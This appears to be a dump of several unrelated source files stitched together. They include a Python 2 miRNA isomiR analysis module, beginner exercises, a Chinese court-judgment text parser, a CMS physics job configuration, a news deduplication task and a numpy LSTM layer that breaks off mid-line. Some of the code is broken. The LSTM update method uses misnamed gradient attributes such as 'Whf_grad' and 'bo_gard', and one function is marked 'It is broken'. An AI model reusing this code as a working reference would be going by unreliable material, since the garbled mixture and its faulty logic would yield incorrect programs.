Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_end_number = Array.index(seq_in_array)\n else:\n zerozero_5p_type = '....'+W5p+'....'\n zerozero_5p_start_number = 4\n zerozero_5p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n for key in miRNA_5p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_end_number\n \n elif len(miRNA_5p_sequence.keys()) == 0 and len(miRNA_3p_sequence.keys()) != 0:\n W3p = miRNA_3p_sequence[miRNA_3p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W3p:\n zerozero_3p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_end_number = Array.index(seq_in_array)\n else:\n zerozero_3p_type = '....'+W3p+'....'\n zerozero_3p_start_number = 4\n zerozero_3p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n \n for key in miRNA_3p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_end_number\n \n else:\n print('The '+self.miRNA+' is fucking shit!')\n quit()\n \n \n \n ###bulid new dic and list\n isomiR_type_dic = {}\n isomiR_type_list = []\n for key in main_key_list:\n \n if 
isomiR_start_type_dic.has_key(key) == True:\n isomiR_type_dic[key] = ','.join([str(isomiR_start_type_dic[key]),str(isomiR_end_type_dic[key]*(-1))])\n elif isomiR_start_type_dic.has_key(key) == False:\n isomiR_type_dic[key] = 'non'\n \n for key in main_key_list:\n \n isomiR_type_list.append(isomiR_type_dic[key])\n \n \n \n \n else:\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n elif unannotated_list != []:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n else:\n print('different type!!')\n quit()\n \n self.isomiR_tabfilewithtitle = tabT\n \n print(str(self.miRNA) + ' is done !! ')\n \n return tabT\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n print(str(self.miRNA) + ' is done !! 
')\n \n return tabT\n \n def process4(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #It is broken\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 4 !')\n \n if self.situation == 'OK':\n #define the percursor_sequence_h\n miRNA = self.miRNA\n \n percursor_ID_list = [x for x in C1.percursor.FastA_dictionary.keys() if 'hsa' in x]\n E = []\n for percursor_ID in percursor_ID_list:\n \n if miRNA in percursor_ID and [x for x in percursor_ID_list if filter(str.isdigit, miRNA) in x] != []:\n E.append(percursor_ID)\n \n \n if len(E) != 1:\n self.situation = 'NO'\n self.percursor_hairpin = 'na'\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n print(self.miRNA + \" can't define the percursor_sequence ! 2\")\n \n return tabT\n \n else:\n self.percursor_hairpin = \"\".join(E[0])\n percursor_sequence = C1.percursor.read(\"\".join(E[0]))\n \n print(percursor_sequence)\n \n #take percursor_genome_left and percursor_genome_right\n location = self.genome_sequence.replace('T', 'U').find(percursor_sequence)\n if location != -1:\n self.percursor_genome_left = self.genome_left + location\n self.percursor_genome_right = self.genome_left + len(percursor_sequence)\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n E = key.split(':')\n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if str(E[1]).upper() in x and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opened !! 
(' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.percursor_genome_left-4-1:self.percursor_genome_left+len(percursor_sequence)+4]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper().replace('T', 'U')\n \n \n self.situation = 'OK'\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n \n return tabT\n \n else:\n self.situation = 'NO'\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n print(self.miRNA + \" can't define the percursor_sequence ! 3\")\n \n return tabT\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = 'na'\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n return tabT\n \n \n return tabT\n \n def process5(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define miRNA precursor and template\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 5 !')\n if self.situation == 'OK':\n miRNA = self.miRNA\n #define the percursor_sequence_h\n precursor_list = C1.matchtable.title_box[C1.matchtable.title_dicX['precursor']-1]\n precursor = [x for x in precursor_list if miRNA in x and len(x.split(' ')[0]) == len(miRNA)]\n \n if len(precursor) == 1:\n percursor_sequence = C1.percursor.read(\"\".join(precursor))\n \n #take percursor_genome_left and percursor_genome_right\n location = self.genome_sequence.replace('T', 'U').find(percursor_sequence)\n if location != -1:\n 
self.percursor_genome_left = self.genome_left + location\n self.percursor_genome_right = self.genome_left + len(percursor_sequence)\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n E = key.split(':')\n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if str(E[1]).upper() in x and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opened !! (' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.percursor_genome_left-4-1:self.percursor_genome_left+len(percursor_sequence)+4]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper().replace('T', 'U')\n \n \n self.situation = 'OK'\n self.percursor_hairpin = \"\".join(precursor)\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = \"\".join('na')\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = \"\".join('na')\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n return tabT\n \n def 
process6(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define mature_start_and_end\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 6 !')\n if self.situation == 'OK':\n \n Array = C1.locationtable.find(self.percursor_hairpin.split(' ')[1]+'_1', 'derives_from')\n for locationtable_key in Array:\n locationtable_miRNAName = C1.locationtable.read('Name_hsaV2',locationtable_key[1])\n \n if '-5p' in locationtable_miRNAName:\n self.mature_5p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_5p_end = C1.locationtable.read('end',locationtable_key[1])\n elif '-3p' in locationtable_miRNAName:\n self.mature_3p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_3p_end = C1.locationtable.read('end',locationtable_key[1])\n else:\n self.mature_3p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_3p_end = C1.locationtable.read('end',locationtable_key[1])\n \n self.situation == 'OK'\n \n else:\n self.situation = 'NO'\n self.mature_3p_start = 0.0\n self.mature_3p_end = 0.0\n self.mature_5p_start = 0.0\n self.mature_5p_end = 0.0\n \n return tabT\n \n def process7(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define isomiR type\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 7 !')\n if self.situation == 'OK':\n \n isomiR_type_dic = {}\n isomiR_type_list = []\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n \n key_start = float(key.split(':')[2].split('-')[0])\n key_end = float(key.split(':')[2].split('-')[1])\n \n if key_start >= self.mature_5p_start-7 and key_end <= self.mature_5p_end+7:\n isomiR_type_dic[key] = ((key_start - self.mature_5p_start),(key_end - self.mature_5p_end))\n elif key_start >= self.mature_3p_start-7 and key_end <= self.mature_3p_end+7:\n isomiR_type_dic[key] 
= ((key_start - self.mature_3p_start),(key_end - self.mature_3p_end))\n else:\n isomiR_type_dic[key] = 'non'\n \n for key in main_key_list:\n isomiR_type_list.append(isomiR_type_dic[key])\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.situation = 'OK'\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.situation = 'NO'\n \n return tabT\n \n #-----------------------------------------------------------------------------------------------\n \n def reportisomiR(self):\n \n display_list = []\n info = ':'.join([self.genome_version, self.genome_chromosome, str(self.genome_left)+'-'+str(self.genome_right), self.genome_strand])\n One_line = '\\t'.join([self.miRNA, info])\n display_list.append(One_line)\n \n Two_line = self.percursor_hairpin_ali\n display_list.append(Two_line)\n \n three_line = self.genome_sequence\n display_list.append(three_line)\n \n main_key_list = self.isomiR_tabfilewithtitle.title_box[self.isomiR_tabfilewithtitle.title_dicX['isoform_coords']-1]\n E = []\n for key in main_key_list:\n result1 = self.isomiR_tabfilewithtitle.read('isomiR_sequence_alignment', key)\n result2 = self.isomiR_tabfilewithtitle.read('read_count', key)\n result3 = self.isomiR_tabfilewithtitle.read('reads_per_million_miRNA_mapped', key)\n result4 = self.isomiR_tabfilewithtitle.read('isomiR_type', key)\n \n E.append('\\t'.join([result1, str(result2), str(result3), result4]))\n four_line = '\\n'.join(E)\n display_list.append(four_line)\n \n five_line = str(self.isomiR_tabfilewithtitle.len_Y)\n display_list.append(five_line)\n \n display = '\\n'.join(display_list)+'\\n'\n print(display)\n \n return 
display","repo_name":"Raxtion/TCGA_miRNA_exp_assay_module_ready_to_use","sub_path":"reference/Lib/multiprocessing/Raxpy3LibdataTCGA_2013_06_11.py","file_name":"Raxpy3LibdataTCGA_2013_06_11.py","file_ext":"py","file_size_in_byte":41728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69977296452","text":"alien_0 = {'color':'green','points':5}\nalien_1 = {'color':'yellow','points':10}\nalien_2 = {'color':'red','points':15}\naliens = [alien_0,alien_1,alien_2]\nfor alien in aliens:\n print(alien)\nprint(\"\\n\")\n\n\n# Cria uma lista vazia para armazenar alienigenas\naliens = []\n# Cria 30 alienígenas verdes\nfor alien_number in range(30):\n new_alien = {'color':'green','points':5,'speed':'slow'}\n aliens.append(new_alien)\n# Muda a cor dos três primeiros alienígenas verdes.\nfor alien in aliens[0:3]:\n if alien['color'] == 'green':\n alien['color'] = 'yellow'\n alien['speed'] = 'medium'\n alien['points'] = 10\n elif alien['color'] == 'yellow':\n alien['color'] = 'red'\n alien['speed'] = 'fast'\n alien['points'] = 15\n# Exibe os 5 primeiros alienígenas.\nfor alien in aliens[0:5]:\n print(alien)\nprint(\"...\")","repo_name":"EduardoDevSantos/Curso_Intensivo_python","sub_path":"6_dicionarios/aliens.py","file_name":"aliens.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34366222469","text":"import os\nimport re\n\nparserList = os.listdir('.')\nparserList.remove('get_paper.py')\nparserList.remove('line.py')\nparserList.remove('main.py')\nparserList.remove('reason_judge.py')\nparserList.remove('all.py')\n\nparserList.remove('accu_defe.py')\n\n#forMAC\nparserList.remove('.DS_Store')\nfor f in parserList:\n courtList = os.listdir(f)\n #forMAC\n courtList.remove('.DS_Store')\n for g in courtList:\n path = f+'/'+g\n files = os.listdir(path)\n #forMAC\n files.remove('.DS_Store')\n for f in files:\n fread = 
open(path+'/'+f ,'r')\n content = fread.read()\n main = content.find('主文')\n content = content[main:]\n fact = content.find('事實')\n reason = content.find('理由')\n reasontype = -1\n if (reason-fact) == 3:\n content = content[reason:]\n reasontype = 1\n elif reason > fact:\n if fact != -1:\n content = content[fact:]\n reasontype = 2\n else:\n content = content[reason:]\n reasontype = 3\n elif fact > reason:\n if reason != -1:\n content = content[reason:]\n reasontype = 3\n else:\n content = content[fact:]\n reasontype = 2\n pattern = '中華民國\\d+年\\d+月\\d+日.*第.+庭.*法官.+?原本無'\n match = re.findall(pattern,content)\n print (f)\n #reason\n reasonContent = ''\n reasonList = []\n if len(match) > 0:\n reasonEnd = content.find(match[0])\n reasonContent = content[:reasonEnd]\n '''\n if reasontype == 1:\n reasonContent = content[:reasonEnd]\n elif reasontype == 2:\n reasonContent = content[:reasonEnd]\n elif reasontype == 3:\n reasonContent = content[:reasonEnd]\n'''\n getreasonList = '(實一、|由一、|。二、|。三、|。四、|。五、|。六、|。七、|。八、|。九、|。十、)'\n numList = re.findall(getreasonList,reasonContent)\n for i in range(len(numList)-1):\n start = reasonContent.find(numList[i])+1\n end = reasonContent.find(numList[i+1])+1\n reasonList.append(reasonContent[start:end])\n reasonContent = reasonContent[end-1:]\n start = reasonContent.find(numList[len(numList)-1])+1\n reasonList.append(reasonContent[start:])\n print (reasonList)\n else:\n print (reasonList)\n #judge\n judgeList = []\n if len(match) > 0:\n judgeContent = match[0]\n judge = judgeContent.find('法官')\n if judgeContent.find('以上') >= 0:\n judgeEnd = judgeContent.find('以上')\n else:\n judgeEnd = judgeContent.find('上')\n judgeContent = judgeContent[judge+2:judgeEnd]\n judgeList = judgeContent.split('法官')\n print (judgeList)\n else:\n print 
(judgeList)\n","repo_name":"tommy413/IM_project","sub_path":"parser/reason_judge.py","file_name":"reason_judge.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14601073645","text":"# cmsRun test_Worker.py maxEvents=5000 notInPCL=False PCLoutName=PCL_worker.root inputFiles=/store/data/Run2018D/SingleMuon/ALCARECO/SiPixelCalSingleMuon-ForPixelALCARECO_UL2018-v1/230000/F33B7CA6-256A-B34F-9536-7594FBC6F75B.root\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('analysis')\noptions.register( \"outName\", \"Tree.root\", VarParsing.multiplicity.singleton, VarParsing.varType.string, \"name and path of the Tree output files (without extension)\" )\noptions.register( \"PCLoutName\", \"DQM_Worker.root\", VarParsing.multiplicity.singleton, VarParsing.varType.string, \"name and path of the PCL Worker output files (without extension)\" )\n\noptions.register( \"notInPCL\", False, VarParsing.multiplicity.singleton, VarParsing.varType.bool, \"Is it in PCL or not ?\" )\noptions.parseArguments()\n\nfrom Configuration.Eras.Era_Run2_2018_cff import Run2_2018\n\nprocess = cms.Process(\"LA\", Run2_2018)\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.GlobalTag.globaltag = \"120X_dataRun2_v2\" # for CMSSW 12_0_0_pre\n\nprocess.load(\"RecoTracker.Configuration.RecoTracker_cff\")\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cff\")\n# https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideFindingBeamSpot\nfrom RecoVertex.BeamSpotProducer.BeamSpot_cff import *\nprocess.offlineBeamSpot = 
offlineBeamSpot\n\nprocess.load(\"RecoTracker.TrackProducer.TrackRefitters_cff\")\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load(\"RecoTracker.MeasurementDet.MeasurementTrackerEventProducer_cfi\")\n\nprocess.MeasurementTrackerEvent.pixelClusterProducer = 'ALCARECOSiPixelCalSingleMuon'\nprocess.MeasurementTrackerEvent.stripClusterProducer = 'ALCARECOSiPixelCalSingleMuon'\nprocess.MeasurementTrackerEvent.inactivePixelDetectorLabels = cms.VInputTag()\nprocess.MeasurementTrackerEvent.inactiveStripDetectorLabels = cms.VInputTag()\n\nprocess.load(\"RecoTracker.TransientTrackingRecHit.TransientTrackingRecHitBuilderWithoutRefit_cfi\")\nprocess.TrackRefitter.src = 'ALCARECOSiPixelCalSingleMuon'\nprocess.TrackRefitter.TrajectoryInEvent = True\n\n\nprocess.load(\"CalibTracker.SiPixelLorentzAngle.SiPixelLorentzAnglePCLWorker_cfi\")\nprocess.SiPixelLorentzAnglePCLWorker.folder = cms.string('AlCaReco/SiPixelLorentzAngleHarvesting/')\nprocess.SiPixelLorentzAnglePCLWorker.fileName = cms.string(options.outName)\nprocess.SiPixelLorentzAnglePCLWorker.notInPCL = cms.bool(options.notInPCL)\n\n\nprocess.DQMoutput = cms.OutputModule(\"DQMRootOutputModule\",\n fileName = cms.untracked.string(options.PCLoutName))\n \nprocess.p = cms.Path(process.offlineBeamSpot*\n process.MeasurementTrackerEvent*\n process.TrackRefitter*\n process.SiPixelLorentzAnglePCLWorker)\n\nprocess.DQMoutput_step = cms.EndPath(process.DQMoutput)\n\nprocess.schedule = cms.Schedule(\n process.p,\n process.DQMoutput_step\n )\n \nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n \nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(options.inputFiles),\n secondaryFileNames = 
cms.untracked.vstring()\n)\n\n#process.options.numberOfThreads=cms.untracked.uint32(4)\n","repo_name":"wweiphy/LA","sub_path":"test_Worker.py","file_name":"test_Worker.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7632991624","text":"n, m = map(int, input().split())\nmatrix = [list(input()) for _ in range(n)]\nres = set()\n\ndef bf(cur, x, y, dx, dy):\n temp = int(cur) ** 0.5\n if int(temp) == temp:\n res.add(int(cur))\n x += dx\n y += dy\n if 0 <= x < n and 0 <= y < m:\n cur += matrix[x][y]\n bf(cur, x, y, dx, dy)\n\nif n == 1 and m == 1:\n temp = int(matrix[0][0]) ** 0.5\n print(matrix[0][0] if int(temp) == temp else -1)\nelse:\n for i in range(n):\n for j in range(m):\n for dx in range(n):\n for dy in range(m):\n if dx != 0 or dy != 0:\n bf(matrix[i][j], i, j, dx, dy)\n bf(matrix[i][j], i, j, -dx, dy)\n bf(matrix[i][j], i, j, dx, -dy)\n bf(matrix[i][j], i, j, -dx, -dy)\n print(max(res) if len(res) else -1)","repo_name":"YouTaekJung/Algorithm","sub_path":"Baekjoon/Brute_Force/1025_제곱수_찾기.py","file_name":"1025_제곱수_찾기.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31747112032","text":"h = int(input(\"Unesite broj molekula vodonika: \"))\r\ns = int(input(\"Unesite broj molekula sumpora: \"))\r\no = int(input(\"Unesite broj molekula kiseonika: \"))\r\n\r\ndef kiselina(h, s, o):\r\n \"\"\"\r\n ulazni parametri: h -> broj molekula vodonika\r\n s -> broj molekula sumpora\r\n o -> broj molekula kiseonika\r\n returns koliko se najvise molekula sumporne kiseline H2SO4 moze dobiti od datih molekula\r\n \"\"\"\r\n broj_kiselina = 0\r\n while h - 2 > 0 and o - 4 > 0 and s - 1 > 0:\r\n broj_kiselina = broj_kiselina + 1\r\n h = h - 2 \r\n s = s - 1\r\n o = o - 4\r\n return broj_kiselina\r\nprint(kiselina(h, s, 
o))","repo_name":"andjelao/Zbirka2-ostatak-zadataka","sub_path":"str07_zad32.py","file_name":"str07_zad32.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37776763181","text":"import time\nfrom textrank4zh import TextRank4Keyword\n\nfrom model.mongo import Mongo\nfrom tasks.celery_app import celery_app\n\n\ndef get_keywords(text):\n if not text:\n return []\n result = []\n tr4w = TextRank4Keyword()\n tr4w.analyze(text=text, lower=True, window=2) # py2中text必须是utf8编码的str或者unicode对象,py3中必须是utf8编码的bytes或者str对象\n for item in tr4w.get_keywords(20, word_min_len=2):\n result.append(item.word)\n return result\n\n\ndef is_sim(new1, new2):\n words1 = new1['keywords_temp']\n words2 = new2['keywords_temp']\n repeat = [word for word in words1 if word in words2]\n if words2 and words1 and repeat:\n if len(repeat) > 4 or len(repeat) / (len(words1)) > 0.5 or len(repeat) / (len(words2)) > 0.5:\n return True\n return False\n\n\n@celery_app.task\ndef find_repeat_news():\n \"\"\"\n repeat 1 重复 -1 不重复\n :return:\n \"\"\"\n collection = Mongo().news\n news = list(collection.find({'created_at': {'$gt': time.time() - 3600}}))\n for new in news:\n new['keywords_temp'] = get_keywords(new['content'])\n for new1 in news:\n if new1.get('repeat'):\n new1['state'] = 1\n continue\n for new2 in news:\n if new2['_id'] == new1['_id']:\n continue\n if is_sim(new1, new2):\n new1['repeat'] = 1\n new1['state'] = 1\n break\n if new1.get('state') != 1:\n new1['state'] = 1\n new1['repeat'] = -1\n for new in news:\n new.pop('state')\n new.pop('keywords_temp')\n collection.save(new)\n\n\nif __name__ == '__main__':\n time1 = time.time()\n find_repeat_news()\n print(time.time() - 
time1)\n","repo_name":"Fern9/newsSpider","sub_path":"tasks/news_repeat/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18524484286","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom cnn import element_wise_op\nfrom activators import SigmoidActivator, TanhActivator, IdentityActivator\nfrom functools import reduce\n\nclass LstmLayer(object):\n def __init__(self, input_width, state_width, learning_rate):\n self.bf_grad = None\n self.Wfx_grad = None\n self.Wfh_grad = None\n self.delta_ct_list = None\n self.delta_f_list = None\n self.delta_i_list = None\n self.delta_o_list = None\n self.delta_h_list = None\n self.input_width = input_width\n self.state_width = state_width\n self.learning_rate = learning_rate\n self.gate_activator = SigmoidActivator()\n self.output_activator = TanhActivator()\n self.times = 0\n # 各个时刻的单元向量c\n self.c_list = self.init_state_vec()\n # 各个时刻的输出向量\n self.h_list = self.init_state_vec()\n # 各个时刻的遗忘门向量\n self.f_list = self.init_state_vec()\n # 各个时刻的输入们向量\n self.i_list = self.init_state_vec()\n # 各个时刻的输出门向量\n self.o_list = self.init_state_vec()\n # 各个时刻的即使状态c~\n self.ct_list = self.init_state_vec()\n # 遗忘门权重矩阵Wfh Wfx 偏置项 bf\n self.Wfh, self.Wfx, self.bf = (\n self.init_weight_mat())\n # 输入门的权重\n self.Wih, self.Wix, self.bi = (\n self.init_weight_mat())\n # 输出门的权重\n self.Woh, self.Wox, self.bo = (\n self.init_weight_mat())\n # 单元状态的权重\n self.Wch, self.Wcx, self.bc = (\n self.init_weight_mat())\n\n def init_state_vec(self):\n \"\"\"\n 初始化保存的向量\n :return:\n \"\"\"\n state_vec_list = []\n state_vec_list.append(np.zeros((self.state_width, 1)))\n return state_vec_list\n\n def init_weight_mat(self):\n \"\"\"\n 初始化保存状态的向量\n :return:\n \"\"\"\n Wh = np.random.uniform(-1e-4, 1e-4, (self.state_width, self.state_width))\n Wx = np.random.uniform(-1e-4, 1e-4, 
(self.state_width, self.input_width))\n b = np.zeros((self.state_width, 1))\n return Wh, Wx, b\n\n def forward(self, x):\n \"\"\"\n 根据1式-6式进行前向计算\n :param x:\n :return:\n \"\"\"\n self.times += 1\n # 遗忘门\n fg = self.calc_gate(x, self.Wfx, self.Wfh, self.bf, self.gate_activator)\n self.f_list.append(fg)\n # 输入门\n ig = self.calc_gate(x, self.Wix, self.Wih, self.bi, self.gate_activator)\n self.i_list.append(ig)\n # 输出门\n og = self.calc_gate(x, self.Wox, self.Woh, self.bo, self.gate_activator)\n self.o_list.append(og)\n # 即使状态\n ct = self.calc_gate(x, self.Wcx, self.Wch, self.bc, self.output_activator)\n self.ct_list.append(ct)\n # 单元状态\n c = fg * self.c_list[self.times - 1] + ig * ct\n self.c_list.append(c)\n # 输出\n h = og * self.output_activator.forward(c)\n self.h_list.append(h)\n\n def calc_gate(self, x, Wx, Wh, b, activator):\n \"\"\"\n 计算门\n :param x:\n :param Wx:\n :param Wh:\n :param b:\n :param activator:\n :return:\n \"\"\"\n h = self.h_list[self.times - 1] # 上一次的lstm输出\n net = np.dot(Wh, h) + np.dot(Wx, x) + b\n gate = activator.forward(net)\n return gate\n\n def backward(self, x, delta_h, activator):\n \"\"\"\n 实现lstm算法\n :param x:\n :param delta_h:\n :param activator:\n :return:\n \"\"\"\n self.calc_delta(delta_h, activator)\n self.calc_gradient(x)\n\n def update(self):\n \"\"\"\n 按照梯度下降,跟新权重\n :return:\n \"\"\"\n self.Wfh -= self.learning_rate * self.Whf_grad\n self.Wfx -= self.learning_rate * self.Whx_grad\n self.bf -= self.learning_rate * self.bf_grad\n self.Wih -= self.learning_rate * self.Whi_grad\n self.Wix -= self.learning_rate * self.Whi_grad\n self.bi -= self.learning_rate * self.bi_grad\n self.Woh -= self.learning_rate * self.Wof_grad\n self.Wox -= self.learning_rate * self.Wox_grad\n self.bo -= self.learning_rate * self.bo_gard\n self.Wch -= self.learning_rate * self.Wcf_grad\n self.Wcx -= self.learning_rate * self.Wcx_grad\n self.bc -= self.learning_rate * self.bc_grad\n\n def calc_delta(self, delta_h, activator):\n # 初始化各个时刻的误差项\n 
self.delta_h_list = self.init_delta()\n self.delta_o_list = self.init_delta()\n self.delta_i_list = self.init_delta()\n self.delta_f_list = self.init_delta()\n self.delta_ct_list = self.init_delta()\n\n # 保存从上一层传递下来的当前时刻的误差项\n self.delta_h_list[-1] = delta_h\n\n # 迭代计算每个时刻的误差项\n for k in range(self.times, 0, -1):\n self.calc_delta_k(k)\n\n def init_delta(self):\n \"\"\"\n 初始化误差项\n :return: \n \"\"\"\n delta_list = []\n for i in range(self.times + 1):\n delta_list.append(\n np.zeros(\n (self.state_width, 1)\n )\n )\n return delta_list\n\n def calc_delta_k(self, k):\n \"\"\"\n 根据k时刻delta_h, 计算k时刻delta_f\n delta_i, delta_o, delta_ct, 以及k-1时刻的delta_h\n :param k: \n :return: \n \"\"\"\n # 获得k时刻向前计算的值\n ig = self.i_list[k]\n og = self.o_list[k]\n fg = self.f_list[k]\n ct = self.ct_list[k]\n c = self.c_list[k]\n c_prev = self.c_list[k - 1]\n tanh_c = self.output_activator.forward(c)\n delta_k = self.delta_h_list[k]\n\n # 根据式9 计算delta_o\n delta_o = (delta_k * tanh_c * self.gate_activator.backward(og))\n delta_f = (delta_k * og * (1 - tanh_c * tanh_c) * c_prev * 